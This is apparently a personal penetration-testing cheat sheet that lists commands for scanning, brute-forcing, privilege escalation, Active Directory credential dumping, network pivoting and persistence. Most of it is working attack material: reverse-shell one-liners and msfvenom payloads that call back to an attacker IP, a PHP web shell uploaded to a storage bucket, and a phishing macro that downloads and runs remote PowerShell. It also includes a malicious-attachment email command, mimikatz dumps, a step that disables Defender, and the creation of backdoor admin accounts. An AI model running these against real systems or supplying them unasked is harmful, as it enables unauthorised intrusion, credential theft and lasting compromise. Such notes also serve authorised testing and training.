VAPT Notes

Network

Network Enumeration

Host Discovery

# 63 ttl = linux 
# 127 ttl = windows
$ ping $IP 

# disable port scan and enumerate only subnet
$ sudo nmap -sn $IP/24 

# disables ping command and only scans ports 
$ sudo nmap -p- --min-rate 1000 $IP -Pn 
$ sudo nmap -sU -p- --min-rate 1000 $IP -Pn

# Scan network ranges
$ sudo nmap $IP/24 -sn -oA filename | grep for | cut -d" " -f5 
# Scan network ranges on a predefined ip list
$ sudo nmap -sn -oA filename -iL hosts.lst | grep for | cut -d" " -f5 

Advanced Network Scans

# Typical scans for open ports found
$ sudo nmap -p <ports> -sV -sC -A $IP -oN nmap_servers
$ sudo nmap -sU -p <ports> -sV -sC -A $IP -oN nmap_servers

# Stealthy scans
$ sudo nmap -sS -p- --min-rate=1000 $IP -Pn

# Try to connect to filtered port
$ ncat -nv --source-port 53 $IP <port>

# Scan using decoys
$ sudo nmap $IP -p- -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5

# Scan by using different specific IP address
$ sudo nmap $IP -p 445 -Pn -n -O -S $allowed_ip -e tun0 

# SYN-Scan filtered ports From DNS port
$ sudo nmap $IP -p- -sS -Pn -n --disable-arp-ping --source-port 53

# Other DNS proxying techniques
$ sudo nmap $IP -p50000 --source-port 53
$ netcat -nv --source-port 53 $IP 50000

Port Enumeration

FTP | Port 21

# Try to connect to FTP
$ ftp -A $IP
$ ftp $IP

# Set transmission to binary instead of ascii
ftp> binary
# Put file to FTP
ftp> put winPEASx86.exe

# Brute force FTP
$ hydra -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 ftp

# Download all files from FTP
$ wget -r ftp://user:pass@$IP/

SSH | Port 22

$ nc -nvlp 443
$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa user@$IP -t 'bash -i >& /dev/tcp/$OUR_IP/443 0>&1'

# Brute force SSH
$ hydra -l user -P /usr/share/wfuzz/wordlist/others/common_pass.txt $IP -t 4 ssh
$ hydra -L users.txt -p password $IP -t 4 ssh -s <port>

# Change permissions of private key
$ chmod 600 id_rsa
$ ssh user@$IP -i id_rsa

# Convert key to hash for cracking
$ ssh2john id_ecdsa > id_ecdsa.hash
# Crack hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt id_ecdsa.hash

Telnet | Port 23

$ telnet -l user $IP

SMTP | Port 25

$ nc -nv $IP 25
$ telnet $IP 25

DNS | Port 53

# DNS zone transfer
$ dnsrecon -d domain_name -n $IP -t axfr

# Fetch name servers
$ dig +noall +answer -t NS target.com 
# Fetch exchange servers
$ dig +noall +answer -t MX target.com 
# Interrogate a specified domain name server
$ dig +noall +answer -t ANY target.com @ns.target.com 
# Fetch the zone file for a specified domain name server
$ dig +noall +answer -t AXFR target.com @ns.target.com 
# Reverse DNS lookup
$ dig +noall +answer -x 192.168.8.5 

# Subdomain brute force
$ gobuster dns -t 30 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -d website.site

HTTP(S) | Ports 80, 443

# Check robots.txt, sitemap.xml, crossdomain.xml, clientaccesspolicy.xml, .well-known.xml

# If there is /cgi-bin endpoint, try shellshock

$ whatweb -a 3 $IP
$ nikto -ask=no -h http://$IP 2>&1

$ dirsearch -w /usr/share/seclists/Discovery/Web-Content/common.txt -e html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip -x 400,401,402,403,404 -u 10.10.10.10

$ gobuster dir -u http://$IP/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip -b 404,403,400,402,401
$ gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip

$ feroxbuster -u http://$IP/ -t 30 -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -x "html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip" -v -k -n -e --auto-tune
$ feroxbuster -u http://$IP:8000/cms/ -t 30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip" -v -k -n -e -C 404 # if we dont want to see any denied
$ feroxbuster -u http://$IP:8000/cms/ -t 30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "html,php,txt,asp,aspx,sh,cgi,pl,py,bak,sql,old,zip" -v -k -n -e -C 404,302 # if website redirects

$ curl http://$ip/api/
$ curl http://$ip/api/user/v1/
$ curl http://$ip/api/user/v2/

# Fuzzing
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://$IP/FUZZ
$ ffuf -u http://www.target.com -H "Host: FUZZ.target.com" -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -ac
# Fuzzing get parameters
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -fs xxx -u 'http://target.com/admin/admin.php?FUZZ=key' 
# Fuzzing post parameters
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://target.com/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx 
# Fuzzing vhosts
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP -H "HOST: FUZZ.website.com" -fs 10918 
# Fuzzing subdomains
$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.website.htb/ 
# Fuzzing post parameter values
$ ffuf -w ids.txt:FUZZ -u http://target.com/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx 
# Fuzzing get parameter values
$ ffuf -w ids.txt:FUZZ -fs xxx -u 'http://target.com/admin/admin.php?id=FUZZ'

# Login Brute Force
$ hydra -l admin -P rockyou.txt $IP http-post-form "/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V

# Wordpress Scan
$ wpscan --url https://$IP --random-user-agent --ignore-main-redirect --api-token <token>

# AWS Web Service Bucket
$ aws configure
$ aws --endpoint=http://s3.abc.com s3 ls
$ aws --endpoint=http://s3.abc.com s3 ls s3://abc.com
$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
$ aws --endpoint=http://s3.abc.com  s3 cp shell.php s3://abc.com
$ curl http://abc.com/shell.php?cmd=id
$ nc -nvlp 1234
$ rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.108+1234+>/tmp/f

SMB | Ports 139, 445

$ smbclient -L \\$IP -U "" -N -p 12445
$ smbclient '//$IP/C' -p 12445

$ smbmap -H $IP
$ smbmap -u "username" -p "password" -H $IP
$ smbmap -H $IP -u null

$ enum4linux -a -M -l -d $IP 2>&1
$ enum4linux -a -u "" -p "" $IP && enum4linux -a -u "guest" -p "" $IP

$ nxc smb $IP
$ nxc smb $IP -u "" -p "" --shares
$ nxc smb $IP -u 'guest' -p '' --users
$ nxc smb $IP -u users.txt -p 'Pass!' --local-auth --continue-on-success
$ nxc smb $IP -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
$ nxc smb $IP/24 -u administrator -p 'Password123!' --loggedon-users
$ nxc smb $IP -u administrator -p 'Password123!' --sam
$ nxc smb $IP -u Administrator -H <hash>
$ nxc smb dc.abc.org -u '' -p '' --shares
# spider and export all files
$ nxc smb $IP -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True
# list all files
$ nxc smb $IP -u 'user' -p 'pass' -M spider_plus

$ impacket-psexec administrator:'Password123!'@$IP

SNMP | Port 161 UDP

$ nmap --script snmp-* -sU -p161 $IP
$ snmpwalk -c public -v1 $IP
$ snmpcheck -t $IP -c public # Better than snmpwalk
$ snmpwalk -c public -v1 -t 10 $IP # Displays entire MIB tree 

#Windows MIB values
1.3.6.1.2.1.25.1.6.0 - System Processes
1.3.6.1.2.1.25.4.2.1.2 - Running Programs
1.3.6.1.2.1.25.4.2.1.4 - Processes Path
1.3.6.1.2.1.25.2.3.1.4 - Storage Units
1.3.6.1.2.1.25.6.3.1.2 - Software Name
1.3.6.1.4.1.77.1.2.25 - User Accounts
1.3.6.1.2.1.6.13.1.3 - TCP Local Ports
$ snmpwalk -c public -v1 $IP <MIB>

LDAP | Port 389, 636, 3268, 3269

$ ldapsearch -x -H ldap://<IP>:<port> # try on both ldap and ldaps
$ ldapsearch -x -H ldap://$IP -s base namingcontexts
...
dn:
namingcontexts: DC=hutch,DC=offsec
namingcontexts: CN=Configuration,DC=hutch,DC=offsec
...
$ ldapsearch -x -H ldap://$IP -b "DC=hutch,DC=offsec"
$ ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
# CN name describes the info we want to collect
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
$ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

# https://github.com/ropnop/windapsearch
$ python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --computers
$ python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --groups
$ python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --da
$ python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --privileged-users

$ nxc ldap $IP -u '' -p '' -M get-desc-users
$ nxc ldap $IP -u '' -p '' --password-not-required --admin-count --users --groups

MSSQL | Port 1433

$ proxychains nxc mssql -d domain_name -u user -p password -x "whoami" $IP
$ proxychains nxc mssql -d domain_name -u user -p password -x "whoami" $IP -q 'SELECT name FROM master.dbo.sysdatabases;'

mssql> EXEC SP_CONFIGURE 'show advanced options', 1
mssql> EXEC SP_CONFIGURE 'xp_cmdshell' , 1
mssql> xp_cmdshell 'whoami'
mssql> xp_cmdshell 'powershell "Invoke-WebRequest -Uri http://$IP:1337/shell.exe -OutFile c:\Users\Public\shell.exe"'
mssql> xp_cmdshell 'c:\Users\Public\shell.exe"'

NFS | Port 2049

$ nmap -sV --script=nfs-showmount $IP

# Show available NFS shares
$ showmount $IP
$ showmount -e $IP
# Mount NFS share
$ mkdir temp 
$ mount -t nfs -o vers=3 $IP:/home temp -o nolock
$ cd temp
$ tree.

Linux

Linux Enumeration

# UPGRADE YOUR SHELL WHEN YOU GAIN ACCESS TO A SYSTEM!
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
# or 
$ script /dev/null -c bash

$ uname -a
$ cat /etc/issue
$ cat /etc/*-release
$ sudo -l
$ ls -lsaht /etc/sudoers
$ groups <user>
$ env
$ find / -perm -u=s -type f 2>/dev/null
$ find / -perm -g=s -type f 2>/dev/null
$ netstat -antup
$ netstat -tunlp

Credential Hunting

# https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation
# files that were edited in the past 10 mins
$ find / -mmin -10 2>/dev/null | grep -Ev "^/proc"

# in memory passwords
$ strings /dev/mem -n10 | grep -i PASS

# find sensitive files
$ locate password | more
$ find / -name authorized_keys 2> /dev/null
$ find / -name id_rsa 2> /dev/null

Privilege Escalation

# find SUID binaries
$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
$ find / -uid 0 -perm -4000 -type f 2>/dev/null

$ sudo -l

# If LD_PRELOAD is explicitly defined in the sudoers file
$ cat shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
$ sudo LD_PRELOAD=<full_path_to_so_file> <program>

Persistence

$ adduser <uname> # Interactive
$ useradd <uname>
$ useradd -u <UID> -g <group> <uname>  # UID can be anything... this command is to add a user to a specific group

# Adding SSH public key
$ ssh-keygen -t rsa -b 4096 

# This creates both id_rsa and id_rsa.pub in ~/.ssh directory
# Copy the content in "id_rsa.pub" and create ".ssh" directory in /home of target machine
$ chmod 700 ~/.ssh
$ nano ~/.ssh/authorized_keys # enter the copied content here
$ chmod 600 ~/.ssh/authorized_keys

Windows

Phishing

Malicious Macro

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadString('http://x.x.x.x/run.ps1') | IEX"
    Shell str, vbHide
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sending Phishing Email

$ swaks --header "Subject: <subject>" --body "<body>" -t to_who@email.com -f from_who@email.com --server x.x.x.x --attach malicious.docm

Windows Enumeration

PS C:\> systeminfo
PS C:\> hostname
PS C:\> whoami
PS C:\> net users # local users
PS C:\> net users /domain # all users on Domain
PS C:\> net localgroups
PS C:\> net user user1 # more info about user1
PS C:\> net group /domain # enumerate all groups on the domain
PS C:\> net group /domain "group1" # more info about group1
PS C:\> netsh firewall show state
PS C:\> netsh firewall show config
PS C:\> ipconfig /all
PS C:\> route print
PS C:\> arp -A # look for IPs that your victim is connected

Credentials Hunting

PS C:\> Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
PS C:\> Get-ChildItem -Path C:\Users -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
PS C:\> Get-ChildItem -Path C:\Users\user1\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction
PS C:\> tree /f C:\Users\ # look for interesting files, backups etc.
PS C:\> Get-History
PS C:\> (Get-PSReadlineOption).HistorySavePath
PS C:\> type <path>

Exploitation

Binary Hijacking

PS C:\> icalcs "path" # check for F (full permission)
PS C:\> sc qc <servicename>
PS C:\> sc config <service> <option>="<value>" # change the path to the reverseshell location
PS C:\> sc start <servicename>

Unquoted Service Path

PS C:\> wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
PS C:\> icalcs "path" # check for writeable permission
# Replace the executable in the service folder and start the service
PS C:\> sc start <servicename>

Insecure Service Executables

PS C:\> icalcs "path" # File Permissions: Everyone [AllAccess]
# Replace the executable in the service folder and start the service
PS C:\> sc start <service>

Weak Registry Permissions

PS C:\> accesschk /acceptula -uvwqk HKLM\system\currentcontrolset\services\<service> # Check for KEY_ALL_ACCESS
PS C:\> reg query HKLM\system\currentcontrolset\services\<service>
PS C:\> reg add HKLM\SYSTEM\CurrentControlSet\services\<service> /v ImagePath /t REG_EXPAND_SZ /d reverse.exe /f
PS C:\> net start <service>

DLL Hijacking

# use Procmon to check for missing dlls (“NAME NOT FOUND”)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attaker-IP> LPORT=<listening-port> -f dll > filename.dll

Scheduled Tasks

PS C:\> schtasks /query /fo LIST /v | findstr /B /C:"Folder" /C:"TaskName" /C:"Run As User" /C:"Schedule" /C:"Scheduled Task State" /C:"Schedule Type" /C:"Repeat: Every" /C:"Comment"
PS C:\> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
PS C:\> schtasks /query /fo LIST | Where-Object {$_ -like "TaskName*"} | select-string "privilege"
PS C:\> icalcs <path> # need to be writeable

Privilege Escalation

# https://github.com/CCob/SweetPotato
PS C:\> .\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc.exe -a "$KALI_IP 1234 -e cmd"

# https://github.com/BeichenDream/GodPotato/releases
PS C:\> .\GodPotato.exe -cmd "cmd /c whoami"
PS C:\> .\GodPotato.exe -cmd "shell.exe"

Persistence

PS C:\> net user administrator password
PS C:\> net localgroup Administrators hacker /add
PS C:\> net localgroup "Remote Desktop Users" hacker /ADD

Active Directory

https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

https://swisskyrepo.github.io/InternalAllTheThings/

AD Enumeration

$ impacket-GetADUsers -dc-ip $DC_IP "domain.name/" -all 
$ impacket-GetADUsers -dc-ip $DC_IP domain.name/username:password -all

PS C:\> net user /domain
PS C:\> net user <user> /domain
PS C:\> net group /domain
# Download and use PowerView
PS C:\> curl https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 -o PowerView.ps1
PS C:\> ..\PowerView.ps1
# Get members of local group (PowerView)
PS C:\> Get-NetLocalGroup -ComputerName <domain> -Recurse
# Find DC hostname
PS C:\> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

Secrets Dumping

$ impacket-secretsdump Administrator:'password'@$IP -outputfile hashes

PS C:\> ./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
PS C:\> ./mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "vault::cred /patch" "exit"
PS C:\> .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::msv" "lsadump::sam" "exit"

# Leverage ScriptBlock
PS C:\> $sess = New-PSSession -ComputerName <hostname>
PS C:\> Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
PS C:\> iex (iwr http://$IP/Invoke-Mimikatz.ps1 -UseBasicParsing)
PS C:\> Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

$ nxc smb $IP/24 -u -u 'user' -p 'pass' --sam
$ nxc smb $IP/24 -u 'user' -p 'pass' --lsa
$ nxc smb $IP -u 'user' -p 'pass' --ntds
$ nxc smb $IP -u 'user' -p 'pass' --ntds --users
$ nxc smb $IP -u 'user' -p 'pass' --ntds --users --enabled
$ nxc smb $IP -u 'user' -p 'pass' --ntds vss

meterpreter> load kiwi
meterpreter> creds_msv

AD Exploitation

$ nxc smb $IP -u users.txt -p 'password' -d domain.name --continue-on-success
$ nxc smb $IP -u user -p 'password' -d domain.name
$ nxc smb $IP -u users.txt -p pass.txt -d domain.name --continue-on-success
$ proxychains nxc smb $IP -u Administrator -p password -x whoami --local-auth
$ proxychains nxc winrm $IP -u Administrator -p password -x whoami --local-auth
$ nxc winrm $IP -u users.txt -p 'password' -d domain.name --continue-on-success
$ nxc winrm $IP -u user -p 'password' -d domain.name
$ nxc winrm $IP -u users.txt -p pass.txt -d domain.name --continue-on-succes
$ proxychains nxc mssql -d domain.name -u user -p password -x "whoami" $IP

# SMB Execute commands on behalf of other users
$ nxc smb $IP -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
$ netexec smb $IP -u Username -p Password -X 'powershell -e <base64_encoded_payload>'

# Dump file for bloodhound
$ nxc ldap $IP -u user -p pass --bloodhound -ns <ns-ip> --collection All

# AS-REP ROAST
$ nxc ldap $IP -u user -p '' --asreproast output.txt
$ nxc ldap $IP -u user.txt -p '' --asreproast output.txt

# Kerberoast
$ nxc ldap $IP -u user -p pass --kerberoasting output.txt

PS C:\> Add-DomainGroupMember -Identity 'SQLManagers' -Members 'user'
PS C:\> Get-NetGroupMember -GroupName 'SQLManagers'

Persistence

PS C:\> net user <user> <password> /add
PS C:\> net localgroup Administrators <user> /add
PS C:\> net localgroup "Remote Management Users" <user> /add
PS C:\> net localgroup "Remote Desktop Users" <user> /add
PS C:\> Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
PS C:\> Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

Lateral Movement

PS C:\> runas /user:<hostname>\<user> cmd

ligolo-ng

Sources: 1, 2, 3

Create TUN Interfaces

# Download the proxy and agent from https://github.com/nicocha30/ligolo-ng/releases/

# Create new tun interfaces
kali$ sudo ip tuntap add user <username> mode tun ligolo1
kali$ sudo ip link set ligolo1 up

kali$ sudo ip tuntap add user <username> mode tun ligolo2
kali$ sudo ip link set ligolo2 up

kali$ sudo ip tuntap add user <username> mode tun ligolo3
kali$ sudo ip link set ligolo3 up

# Confirm that your new interfaces are up
kali$ ip a

# Start the proxy on Kali machine
kali$ ligolo-proxy -selfcert

First Pivot (Kali --> ligolo1)

# Windows
ligolo1 cmd> ./agent.exe -connect <kali_ip>:11601 -ignore-cert

# Linux
ligolo1$ chmod +x agent && ./agent -connect <kali_ip>:11601 -ignore-cert

# Starting our Pivot
# Choose a session
ligolo-ng$ session
# Verify network instances on connected agent
ligolo1_agent$ ifconfig
ligolo1_agent$ start

# Add a new route (ligolo1 subnet) to our proxy
kali$ sudo ip route add 192.168.8.0/24 dev ligolo1
# Confirm that the route was added
kali$ ip route
# Try pinging the internal server now
kali$ ping 192.168.8.129

# Do a ping sweep to find ligolo2
kali$ for i in {1..254}; do (ping -c 1 192.168.8.$i) | grep "bytes from" &) ;done

# Forward traffic from port 8080 on ligolo1 to port 80 on our Kali
ligolo1_agent$ listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 --tcp
ligolo1_agent$ listener_list

Second Pivot (Kali --> ligolo1 (Jump Host) --> ligolo2)

# On ligolo2, download netcat from Kali through ligolo1
ligolo2 cmd> certutil -urlcache -f http://<ligolo1_ip>:8080/nc.exe nc.exe

# Forward traffic from port 4444 on ligolo1 to port 444 on our Kali
ligolo1_agent$ listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:444 --tcp
ligolo1_agent$ listener_list

# Execute netcat on ligolo2 to connect back to us through ligolo1
ligolo2 cmd> ./nc.exe <ligolo1_ip> 4444 -e cmd.exe

# Catch the reverse shell our kali 
kali$ nc -nlvp 444

# Upload agent to ligolo2
ligolo2 cmd> certutil -urlcache -f http://<ligolo1_ip>:8080/agent.exe agent.exe

# To run Agent on ligolo2, we must create a new listener on ligolo1
ligolo1_agent$ listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

# Execute Agent on ligolo2
ligolo2 cmd> ./agent.exe -connect <ligolo1_ip>:11601 -ignore-cert

# Start the tunnel on Ligolo proxy
ligolo-ng$ session # find ligolo2 agent
ligolo2_agent$: start --tun ligolo2
ligolo2_agent$ ifconfig

# Add a new route (ligolo2 subnet) to our proxy
kali$ sudo ip route add 192.186.119.0/24 dev ligolo2

# Do a ping sweep to find ligolo3
kali$ for i in {1..254}; do (ping -c 1 192.168.119.$i) | grep "bytes from" &) ;done

We can also use nxc:

nxc smb <ligolo2_ip> -u user -H hash -x 'certutil -f -urlcache http://<kali_ip>:8080/tools/ligolo/ligolo-ng_agent_windows_amd64/agent.exe c:\windows\system32\agent.exe'

nxc smb <ligolo2_ip> -u user -H hash -x 'c:\windows\system32\agent.exe -connect <ligolo1_ip>:11601 -ignore-cert'

Third Pivot

# On ligolo3, download netcat from Kali through ligolo2
ligolo3 cmd> certutil -urlcache -f http://<ligolo2_ip>:8080/nc64.exe nc.exe

# Forward traffic from port 9090 on ligolo2 to port 999 on our Kali
ligolo2_agent> listener_add -addr 0.0.0.0:9090 --to 127.0.0.1:999 --tcp

# Execute netcat on ligolo3 to connect back to us through ligolo2
ligolo3 cmd> .\nc.exe <ligolo2_ip> 9090 -e cmd.exe

# Catch the reverse shell from ligolo3
kali$ nc -nlvp 999

# Upload agent to ligolo3
ligolo3 cmd> certutil -urlcache -f http://<ligolo2_ip>:8080/agent.exe agent.exe

ligolo2_agent> listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

ligolo3 cmd> .\agent.exe -ignore-cert -connect <ligolo2_ip>:11601

ligolo2_agent> session # choose ligolo 3
ligolo3_agent> ifconfig
ligolo3_agent> start --tun ligolo3

kali$ sudo ip route add 192.168.79.0/24 dev ligolo3

kali$ ping 192.168.79.128

Using SSH

Referenced from https://notes.benheater.com/books/network-pivoting/page/ssh-port-forwarding

SSH Local Port to Remote Port (-L)

Purpose: Access remote services from your local machine.

Example:

• Local Port: 127.0.0.1:43306 on the attack box.
• Remote Port: 127.0.0.1:3306 on the target machine.
• Traffic sent to 127.0.0.1:43306 on the attack box is forwarded to 127.0.0.1:3306 on the remote server.

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port -i /path/to/private-key user@target

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L 127.0.0.1:43306:127.0.0.1:3306 user@target

# Once configured
local$ mysql -u username -p -h 127.0.0.1 -P 43306
local$ curl http://127.0.0.1:43306

SSH Remote Port to Local Port (-R)

Purpose: Allow remote machines to access services on your local machine.

Example:

• Remote Port: 127.0.0.1:43306 on the target machine.
• Local Port: 127.0.0.1:3306 on the attack box.
• Traffic sent to 127.0.0.1:43306 on the target is forwarded to 127.0.0.1:3306 on the attack box.

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port -i /path/to/private/key user@attack-box-ip

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:43306:127.0.0.1:3306 user@attack-box-ip

# Once configured
remote$ mysql -u username -p -h 127.0.0.1 -P 43306

SSH Forward Dynamic SOCKS Proxy

Purpose: Create a proxy for accessing multiple hosts via the target dynamically.

Example:

• SOCKS Proxy: 127.0.0.1:50001 on the attack box.
• Any traffic configured to use this proxy is routed via the target, making it useful for accessing multiple remote hosts dynamically.

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D attack-ip:attack-port -i /path/to/private-key user@target

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D 127.0.0.1:50001 user@target

# Once configured + edit proxychains
local$ proxychains curl http://remote_example.com

SSH Reverse Dynamic SOCKS Proxy

Purpose: Provide a proxy on the remote machine to access multiple local hosts.

Example:

• SOCKS Proxy: 127.0.0.1:50001 on the target machine.
• Any traffic configured to use this proxy on the target machine is routed via your local machine.

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port -i /path/to/private-key user@attack-box-ip

$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:50001 user@attack-box-ip

# Once configured + edit proxychains
remote$ proxychains http://local_example.com

AV Evasion

https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/

General

virtualenv

# sudo apt-get install virtualenv
$ virtualenv myenv # create virutal environment
$ source myenv/bin/activate # activate the virutal environment
$ deactivate # deactivate the virutal environment

base64

$ base64 -w0 <file> ; echo
$ cat <file> | base64 -d 

Connecting to Target

$ rlwrap -cAr nc -lnvp 443

$ evil-winrm -i $IP -u username -p password
$ evil-winrm -i $IP -u username -H "<hash>"

$ busybox nc $IP 1234 -e sh

$ ssh username@$IP

$ smbclient -U username \\\\$IP\\SHARENAME

Reverse Shells

msfvenom

# EXE 32 bit
$ msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

# EXE 64 bit
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

# ASP
$ msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

# JSP
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

# War
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

# PHP
$ msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

One-Liners

$ bash -i >& /dev/tcp/$IP/4242 0>&1

$ python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

<?php echo shell_exec('bash -i >& /dev/tcp/$IP/443 0>&1');?>

Text Manipulation

# search for the files that contains the phrase password in it
$ grep -ir password
$ grep -iRl "password" ./

# exclude multiple strings
$ grep -Ev 'exclude1 | exclude2' filename.txt

# obtain only lines starting with small letters
$ grep -v '[A-Z]' users.txt

# search and replace strings
$ cat username.txt | sed s/{stringToBeChanged}/{replacementString}/g

curl

# upload files via curl
$ curl --user "{user}:{creds}" --upload-file=<file> "http://$IP/upload_location"

$ curl http://$IP -o index.html

# pipe the requesting files
$ curl http://$IP:$PORT:lin(peas\|enum).sh | bash

# proxy request
$ curl --proxy http://127.0.0.1:8080

$ curl --path-as-is http://$IP/../../../../../../etc/passwd

